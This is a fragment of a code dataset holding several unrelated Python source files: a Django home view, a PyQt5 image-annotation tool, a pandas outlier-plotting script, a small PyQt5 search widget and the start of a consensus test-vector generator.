"requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "leia_api.constants.GBIF_API_SUGGEST_URL", "line_number": 8, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "leia_api.constants.GBIF_API_DISTRIBUTIONS_PREFIX_URL", "line_number": 15, "usage_type": "name"}, {"api_name": "leia_api.constants.GBIF_API_DISTRIBUTIONS_SUFFIX_URL", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "379206363", "text": "from django.shortcuts import render\nfrom Property.models import Property, Category\nfrom django.db.models import Count\n\n# Create your views here.\ndef home(request):\n\n category_list = Category.objects.annotate(count = Count('property')).values('name', 'count', 'image')\n print(category_list)\n template = 'home.html'\n context = { \n 'category_list' : category_list,\n }\n return render(request, template, context)", "sub_path": "Home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 432, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "Property.models.Category.objects.annotate", "line_number": 8, "usage_type": "call"}, {"api_name": "Property.models.Category.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Property.models.Category", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 8, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "361350654", "text": "# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# file_name: labelimg_six.py\n# author: ScCcWe\n# time: 2020/4/23 9:29\n\"\"\"\n框选 + 标记工具,框选借鉴labelimg,标记自己搭建\n\"\"\"\nimport os\nimport sys\n\nif hasattr(sys, 'frozen'):\n os.environ['PATH'] = sys._MEIPASS + \";\" + os.environ['PATH']\n\nimport copy\nimport json\nfrom natsort import natsorted\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nfrom UI_six import Ui_MainWindow\nfrom libs.canvas import Canvas\nfrom libs.shape import Shape\nfrom images import *\n\n__appname__ = 'label_SIX'\nFORMAT_DICT_DICT_LIST = {'backlight': ['yes', 'no'],\n 'hasGlove': ['yes', 'no'],\n 'resolution': ['clear', 'blur', 'dark', 'invisible'],\n 'immerse': ['yes', 'no'],\n 'lightOn': ['on', 'off'],\n 'integrity': ['full', '80%+', '80%-', 'nodevice'],\n 'angle': ['front', 'side']}\nFORMAT_DICT_KEY_LIST = ['backlight', 'hasGlove', 'resolution', 'immerse', 'lightOn', 'integrity', 'angle']\nFORMAT_DICT_DEFAULT = {FORMAT_DICT_KEY_LIST[0]: 'no',\n FORMAT_DICT_KEY_LIST[1]: 'no',\n FORMAT_DICT_KEY_LIST[2]: 'clear',\n FORMAT_DICT_KEY_LIST[3]: 'no',\n FORMAT_DICT_KEY_LIST[4]: 'on',\n FORMAT_DICT_KEY_LIST[5]: 'full',\n FORMAT_DICT_KEY_LIST[6]: 'front'}\n\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n CREATE, EDIT = list(range(2))\n \n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n __appicon__ = QtGui.QIcon(\":/icons/\" + 'pipi.jpg')\n self.setWindowIcon(__appicon__) # 设置主程序图标\n self.setWindowTitle(__appname__) # 设置主程序标题\n self.dir_list = None # 文件列表(打开的全部)\n self.dir_quantity = 0 # 文件总数\n self.seleDir = None # 文件父路径\n self.dir_show_num = 0 # 当前文件的index\n \n self.exampleDict = self.set_format_dict() # 标注字典格式\n self.tempDict = None # 实际使用的字典壳子,通过深拷贝(copy.deepcopy())\n \n self.set_button_icons() # 设置按钮的图标\n self.init_button_setting() # 初始化按钮的设置\n \n self.button_list = [self.pushButton_backlight_yes,\n self.pushButton_backlight_no,\n self.pushButton_hasGlove_yes,\n self.pushButton_hasGlove_no,\n self.pushButton_resolution_clear,\n self.pushButton_resolution_blur,\n self.pushButton_resolution_dark,\n self.pushButton_resolution_invisible,\n self.pushButton_immerse_yes,\n self.pushButton_immerse_no,\n self.pushButton_lightOn_on,\n self.pushButton_lightOn_off,\n self.pushButton_integrity_full,\n self.pushButton_integrity_complete,\n self.pushButton_integrity_incomplete,\n self.pushButton_integrity_nodevice,\n self.pushButton_angle_front,\n self.pushButton_angle_side]\n \n self._noSelectionSlot = False\n \n self.listWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)\n \n self.canvas = Canvas()\n self.cursor = self.canvas.cursor\n self.scrollArea.setWidget(self.canvas)\n # self.canvas.scrollRequest.connect(self.scrollRequest)\n self.canvas.newShape.connect(self.newShape)\n # self.canvas.shapeMoved.connect(self.setDirty)\n self.canvas.selectionChanged.connect(self.shapeSelectionChanged)\n # self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)\n \n # 初始化时就设置自动保存\n self.action_autosave.setCheckable(True)\n self.action_autosave.setChecked(True)\n \n @staticmethod\n def set_format_dict():\n # 得到一个标注格式的字典壳子\n a = {}\n for i in FORMAT_DICT_KEY_LIST:\n a[i] = ''\n return a\n \n def set_button_icons(self):\n self.action_root.setIcon(QtGui.QIcon(\":/icons/open.png\"))\n self.action_pre.setIcon(QtGui.QIcon(\":/icons/prev.png\"))\n self.action_next.setIcon(QtGui.QIcon(\":/icons/next.png\"))\n self.action_edit.setIcon(QtGui.QIcon(\":/icons/edit.png\"))\n self.action_rect.setIcon(QtGui.QIcon(\":/icons/objects.png\"))\n self.action_save.setIcon(QtGui.QIcon(\":/icons/save.png\"))\n self.action_delete.setIcon(QtGui.QIcon(\":/icons/delete.png\"))\n self.action_autosave.setIcon(QtGui.QIcon(\":/icons/done.png\"))\n self.action_copy.setIcon(QtGui.QIcon(\":/icons/copy.png\"))\n \n def init_button_setting(self):\n self.action_next.setEnabled(False)\n self.action_pre.setEnabled(False)\n self.action_save.setEnabled(False)\n self.action_rect.setEnabled(False)\n self.action_edit.setEnabled(False)\n self.action_delete.setEnabled(False)\n self.action_copy.setEnabled(False)\n \n def init_button_func(self):\n self.action_next.setEnabled(True)\n self.action_pre.setEnabled(True)\n self.action_save.setEnabled(True)\n self.action_rect.setEnabled(True)\n \n def deleteSelectedShape(self):\n shape = self.canvas.deleteSelected()\n if shape:\n self.init_color()\n self.action_edit.setEnabled(False)\n self.action_delete.setEnabled(False)\n \n # React to canvas signals. (对画布信号做出反应)\n # 具体反应在list中, 还有rect本身\n def shapeSelectionChanged(self, selected=False):\n if self._noSelectionSlot: # 如果用户没有选择rect(初始值即为False), 将re(这是防止出现错误)\n self._noSelectionSlot = False\n else:\n shape = self.canvas.selectedShape # self.canvas.selectedShape:当前选中的rect\n if shape:\n self.tempDict = shape.label\n self.showStatus(shape.label)\n else:\n self.init_color()\n self.action_edit.setEnabled(selected)\n self.action_delete.setEnabled(selected)\n # self.action_copy.setEnabled(selected)\n \n def newShape(self):\n json_data = copy.deepcopy(FORMAT_DICT_DEFAULT)\n self.canvas.mode_to_edit()\n if json_data is not None:\n self.canvas.setLastLabel(json_data)\n self.tempDict = json_data\n self.showStatus(json_data)\n \n def copyShape(self):\n self.canvas.endMove(copy=True)\n labels = self.canvas.selectedShape.label\n self.canvas.copySelectedShape()\n self.canvas.setLastLabel(labels)\n \n def moveShape(self):\n self.canvas.endMove(copy=False)\n # self.setDirty()\n \n def copySelectedShape(self):\n labels = self.canvas.selectedShape.label\n self.canvas.copySelectedShape()\n self.canvas.setLastLabel(labels)\n \n # fix copy and delete\n # self.shapeSelectionChanged(True)\n \n def save_current_json(self):\n \"\"\"以json格式保存(ctrl+s)\n \"\"\"\n def format_shape(s):\n return dict(labels=s.label,\n position=[{'x': int(p.x()), 'y': int(p.y())} for index, p in enumerate(s.points) if index == 0 or index == 2])\n if self.canvas.shapes:\n shapes = [format_shape(shape) for shape in self.canvas.shapes]\n self.save_as_json(shapes)\n else:\n json_path = self.seleDir + '\\\\' + self.dir_list[self.dir_show_num].split('.', 2)[0] + '.json'\n if os.path.exists(json_path):\n os.remove(json_path)\n \n def save_as_json(self, data):\n \"\"\"以json格式保存label\"\"\"\n json_path = self.seleDir + '\\\\' + self.dir_list[self.dir_show_num].split('.', 2)[0] + '.json'\n with open(json_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(data, f, indent=4, ensure_ascii=False)\n \n def fileitemDoubleClicked(self, item=None):\n # 在跳转前需要先保存当前的json\n self.save_current_json()\n \n currIndex = self.dir_list.index((item.text()))\n if currIndex < len(self.dir_list):\n self.dir_show_num = currIndex\n self.show_img_list_change()\n self.show_path_name()\n self.showImg()\n \n def show_filenames_in_list_widget(self, param_img_list):\n \"\"\"将img展示在listWidget中\"\"\"\n for index, imgPath in enumerate(param_img_list):\n item = QtWidgets.QListWidgetItem(imgPath)\n self.listWidget.addItem(item)\n \n def func_message_show(self, param_string):\n \"\"\"用户提示框\"\"\"\n QtWidgets.QMessageBox.warning(\n self, 'WARNING', param_string,\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.Yes\n )\n \n def show_img_list_change(self):\n \"\"\"增加用户识别,会让读取的dir,有一种印上去的感觉\"\"\"\n self.listWidget.item(self.dir_show_num).setSelected(True)\n \n def get_natsorted_file_list(self):\n if self.seleDir is not None:\n file_list = []\n for file in os.listdir(self.seleDir):\n if file.lower().endswith('.png') or file.lower().endswith('.jpg') or file.lower().endswith('.jepg'):\n file_list.append(file)\n return natsorted(file_list)\n \n def select_root_dir(self):\n \"\"\"选择文件夹\"\"\"\n # re\n self.dir_list = None\n self.dir_show_num = 0\n self.canvas.shapes = []\n \n # func\n self.seleDir = QtWidgets.QFileDialog.getExistingDirectory(self, '请选择打开的目录')\n if self.seleDir == '':\n return\n self.deal_with_dir_list()\n self.init_button_func()\n \n def deal_with_dir_list(self):\n self.dir_list = self.get_natsorted_file_list()\n \n self.listWidget.clear()\n self.show_filenames_in_list_widget(self.dir_list)\n \n self.dir_quantity = len(self.dir_list)\n self.label_all.setText('/' + str(self.dir_quantity))\n self.label_one.setText(\"当前:\" + str(self.dir_show_num + 1)) # 0+1=1\n \n self.show_img_list_change()\n \n # 展示图片和路径\n self.show_path_name()\n self.showImg()\n \n # json\n self.forward_json()\n \n # 让使用者直观的看到变化\n if self.tempDict:\n self.showStatus(self.tempDict)\n \n def show_path_name(self):\n if self.dir_list[self.dir_show_num]:\n self.label_dirName.setText(\"当前处理的路径为:\" + self.seleDir + '/' + self.dir_list[self.dir_show_num])\n \n def json_data_dis(self, json_data, param_label):\n if param_label in json_data.keys():\n self.tempDict[param_label] = json_data[param_label]\n \n def forward_json(self):\n json_path = self.seleDir + '\\\\' + self.dir_list[self.dir_show_num].split('.', 2)[0] + '.json'\n \n if os.path.exists(json_path):\n with open(json_path, \"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n # self.tempDict = data[0]['labels']\n # print(self.tempDict)\n # print(data)\n for shape in data:\n points = shape['position']\n label = shape['labels']\n start_point = QtCore.QPointF(points[0]['x'], points[0]['y']) # 左上\n end_point = QtCore.QPointF(points[1]['x'], points[1]['y']) # 右下\n \n two_points = Shape()\n two_points.addPoint(start_point)\n two_points.addPoint(end_point)\n four_points = self.canvas.points_to_point_four(copy.deepcopy(two_points))\n \n with_points_shape = Shape()\n with_points_shape.points = four_points\n with_points_shape.close() # 闭合最后一条线\n self.canvas.shapes.append(with_points_shape)\n self.canvas.shapes[-1].label = label\n self.canvas.repaint()\n else:\n self.tempDict = copy.deepcopy(self.exampleDict)\n \n def showImg(self):\n # 图片展示\n # print(self.seleDir + '/' + self.dir_list[self.dir_show_num])\n # C:/Users/hwx827939/Desktop/pic/20200310-094603(eSpace).png\n self.canvas_show_sth(self.seleDir + '/' + self.dir_list[self.dir_show_num])\n \n # 图片信息展示\n self.label_one.setText(\"当前:\" + str(self.dir_show_num + 1))\n \n def canvas_show_sth(self, imagepath):\n # imagepath = r'D:\\task\\300\\0300_310.jpg'\n image = QtGui.QImage(imagepath)\n self.canvas.load_pixmap(QtGui.QPixmap.fromImage(image))\n \n # canvas fit window\n self.file_or_dir_fit_window()\n \n def file_or_dir_fit_window(self):\n self.canvas.scale = self.scale_fit_window() # 随之变动\n self.canvas.repaint()\n \n def scale_fit_window(self):\n e = 2.0 # So that no scrollbars are generated.\n w1 = self.scrollArea.width() - e\n h1 = self.scrollArea.height() - e\n a1 = w1 / h1 # 宽高比a1 例如:16:9\n w2 = self.canvas.pixmap.width() - 0.0\n h2 = self.canvas.pixmap.height() - 0.0\n a2 = w2 / h2\n return w1 / w2 if a2 >= a1 else h1 / h2\n \n def last_dir(self):\n if self.dir_list is not None:\n if self.action_autosave.isChecked():\n self.save_current_json()\n if self.dir_show_num > 0:\n self.canvas.shapes = []\n self.dir_show_num -= 1\n self.show_img_list_change()\n self.show_path_name()\n self.showImg()\n self.forward_json()\n \n def next_dir(self):\n if self.dir_list is not None:\n # 自动保存\n if self.action_autosave.isChecked():\n self.save_current_json()\n \n if self.dir_show_num < self.dir_quantity - 1:\n # re\n self.canvas.shapes = []\n \n # func\n self.dir_show_num += 1\n self.show_img_list_change()\n self.show_path_name()\n self.showImg()\n self.forward_json()\n \n def creating(self):\n return self.mode == self.CREATE\n \n def editing(self):\n return self.mode == self.EDIT\n \n def mode_to_create(self):\n self.canvas.mode_to_create()\n \n def mode_to_edit(self):\n self.canvas.mode_to_edit()\n \n def init_color(self):\n self.button_list[0].setStyleSheet(\"\")\n self.button_list[1].setStyleSheet(\"\")\n self.button_list[2].setStyleSheet(\"\")\n self.button_list[3].setStyleSheet(\"\")\n self.button_list[4].setStyleSheet(\"\")\n self.button_list[5].setStyleSheet(\"\")\n self.button_list[6].setStyleSheet(\"\")\n self.button_list[7].setStyleSheet(\"\")\n self.button_list[8].setStyleSheet(\"\")\n self.button_list[9].setStyleSheet(\"\")\n self.button_list[10].setStyleSheet(\"\")\n self.button_list[11].setStyleSheet(\"\")\n self.button_list[12].setStyleSheet(\"\")\n self.button_list[13].setStyleSheet(\"\")\n self.button_list[14].setStyleSheet(\"\")\n self.button_list[15].setStyleSheet(\"\")\n self.button_list[16].setStyleSheet(\"\")\n self.button_list[17].setStyleSheet(\"\")\n \n def color(self, label_dict, param_attribute, param_state, param_button):\n if label_dict[param_attribute] == param_state:\n param_button.setStyleSheet(\"background-color: rgb(49, 247, 244);\")\n else:\n param_button.setStyleSheet(\"\")\n \n def showStatus(self, label_dict):\n self.color(label_dict, FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][0], self.button_list[0])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][1], self.button_list[1])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][0], self.button_list[2])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][1], self.button_list[3])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][0], self.button_list[4])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][1], self.button_list[5])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][2], self.button_list[6])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][3], self.button_list[7])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][0], self.button_list[8])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][1], self.button_list[9])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][0], self.button_list[10])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][1], self.button_list[11])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][0], self.button_list[12])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][1], self.button_list[13])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][2], self.button_list[14])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][3], self.button_list[15])\n \n self.color(label_dict, FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][0], self.button_list[16])\n self.color(label_dict, FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][1], self.button_list[17])\n \n def input_json_data(self, param_attribute, param_state):\n self.tempDict[param_attribute] = param_state\n self.showStatus(self.tempDict)\n \n def backlight_yes(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][0])\n \n def backlight_no(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[0], FORMAT_DICT_DICT_LIST['backlight'][1])\n \n def hasGlove_yes(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][0])\n \n def hasGlove_no(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[1], FORMAT_DICT_DICT_LIST['hasGlove'][1])\n \n def resolution_clear(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][0])\n \n def resolution_blur(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][1])\n \n def resolution_dark(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][2])\n \n def resolution_invisible(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[2], FORMAT_DICT_DICT_LIST['resolution'][3])\n \n def immerse_yes(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][0])\n \n def immerse_no(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[3], FORMAT_DICT_DICT_LIST['immerse'][1])\n \n def lightOn_on(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][0])\n \n def lightOn_off(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[4], FORMAT_DICT_DICT_LIST['lightOn'][1])\n \n def integrity_full(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][0])\n \n def integrity_complete(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][1])\n \n def integrity_incomplete(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][2])\n \n def integrity_nodevice(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[5], FORMAT_DICT_DICT_LIST['integrity'][3])\n \n def angle_front(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][0])\n \n def angle_side(self):\n self.input_json_data(FORMAT_DICT_KEY_LIST[6], FORMAT_DICT_DICT_LIST['angle'][1])\n\n\ndef get_main_app():\n app = QtWidgets.QApplication(sys.argv)\n win = MainWindow()\n win.showMaximized()\n return app, win\n\n\ndef main():\n app, win = get_main_app()\n return app.exec_()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n", "sub_path": "pip下载��模块moudle/pyqt5/labelsix/label_six.py", "file_name": "label_six.py", "file_ext": "py", "file_size_in_byte": 21272, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys._MEIPASS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "UI_six.Ui_MainWindow", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 49, "usage_type": "name"}, {"api_name": "libs.canvas.Canvas", "line_number": 86, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 108, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 108, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 109, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 112, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 112, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 113, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 113, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 114, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 114, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 115, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 116, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 200, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QListWidgetItem", "line_number": 216, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 216, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.warning", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 221, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 221, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 223, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 223, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 233, "usage_type": "call"}, {"api_name": "natsort.natsorted", "line_number": 236, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 246, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 246, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 246, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 286, "usage_type": "call"}, {"api_name": "os.path", "line_number": 286, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 288, "usage_type": "call"}, {"api_name": "libs.shape.Shape", "line_number": 298, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 301, "usage_type": "call"}, {"api_name": "libs.shape.Shape", "line_number": 303, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 310, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 323, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 323, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 324, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 324, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 324, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 496, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 496, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 496, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 508, "usage_type": "call"}]} +{"seq_id": "276513578", "text": "#-*- coding: utf-8 -*-\n# 基本信息统计\nimport pandas as pd\ncatering_sale='C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\catering_sale.xls'\ndata=pd.read_excel(catering_sale,index_col='日期')\ndetails=data.describe()\nprint(details)\nprint('')\n\n# 异常值检测\nimport matplotlib.pyplot as plt #图像库\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus']=False\n\nplt.figure() #画图\np=data.boxplot(return_type='dict')#画箱线图,直接使用DataFrame的方法\nx=p['fliers'][0].get_xdata()# 第一个异常点的数值\ny=p['fliers'][0].get_ydata()# 'flies'即为异常值的标签\ny.sort()#排序\n\n#用annotate添加注释\n#其中有些相近的点,注解会出现重叠,难以看清,需要一些技巧来控制。\n#以下参数都是经过调试的,需要具体问题具体调试。\nfor i in range(len(x)): \n if i>0:\n plt.annotate(y[i], xy = (x[i],y[i]), xytext=(x[i]+0.05 -1.8/(y[i]-y[i-1]),y[i]))\n else:\n plt.annotate(y[i], xy = (x[i],y[i]), xytext=(x[i]+0.08,y[i]))\n\nplt.show() #展示箱线图\n\n\n#一致性分析\n", "sub_path": "数据探索/基本信息和异常值分析.py", "file_name": "基本信息和异常值分析.py", "file_ext": "py", "file_size_in_byte": 1096, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_excel", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 12, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "362723289", "text": "from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QVBoxLayout, QGridLayout, QLabel, QSizePolicy, \\\n QStackedWidget, QBoxLayout, QHBoxLayout, QFileDialog, QLineEdit\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QColor, QLinearGradient, QBrush, QPalette, QFont, QPixmap\n\n\nclass AccessData(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def enterPress(self, text):\n print(\"edited\" + text)\n\n def initUI(self):\n grid = QGridLayout()\n grid.setSpacing(10)\n\n searchBar = QLineEdit()\n searchBar.setPlaceholderText(\"Search...\")\n\n searchBar.editingFinished.connect(self.enterPress)\n\n go_button = QPushButton()\n go_button.setText(\"Go\")\n\n viewAll = QPushButton()\n viewAll.setText(\"View All\")\n\n\n grid.addWidget(searchBar, 1, 0)\n grid.addWidget(go_button, 1, 1)\n grid.addWidget(viewAll, 1, 2)\n\n self.setLayout(grid)\n self.setGeometry(300, 300, 350, 300)\n\n self.show()\n\n\n\n\n", "sub_path": "scratchSpaces/suzieScratchSpace/AccessData.py", "file_name": "AccessData.py", "file_ext": "py", "file_size_in_byte": 1038, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "198224283", "text": "from typing import Dict, List, IO, Any\nimport json\n\nimport ed25519\n\nfrom e2e.Libs.BLS import PrivateKey, PublicKey\n\nfrom e2e.Classes.Transactions.Data import Data\n\nfrom e2e.Classes.Consensus.Verification import SignedVerification\nfrom e2e.Classes.Consensus.VerificationPacket import SignedVerificationPacket, SignedMeritRemovalVerificationPacket\nfrom e2e.Classes.Consensus.MeritRemoval import SignedMeritRemoval\n\nfrom e2e.Classes.Consensus.SpamFilter import SpamFilter\n\nfrom e2e.Vectors.Generation.PrototypeChain import PrototypeChain\n\nedPrivKey: ed25519.SigningKey = ed25519.SigningKey(b'\\0' * 32)\nedPubKey: ed25519.VerifyingKey = edPrivKey.get_verifying_key()\n\nblsPrivKey: PrivateKey = PrivateKey(0)\nblsPubKey: PublicKey = blsPrivKey.toPublicKey()\n\nspamFilter: SpamFilter = SpamFilter(5)\n\ne1Chain: PrototypeChain = PrototypeChain(1, False)\ne2Chain: PrototypeChain = PrototypeChain(1, False)\n\n#Create the initial Data and two competing Datas.\ndatas: List[Data] = [Data(bytes(32), edPubKey.to_bytes())]\ndatas.append(Data(datas[0].hash, b\"Initial Data.\"))\ndatas.append(Data(datas[0].hash, b\"Second Data.\"))\nfor 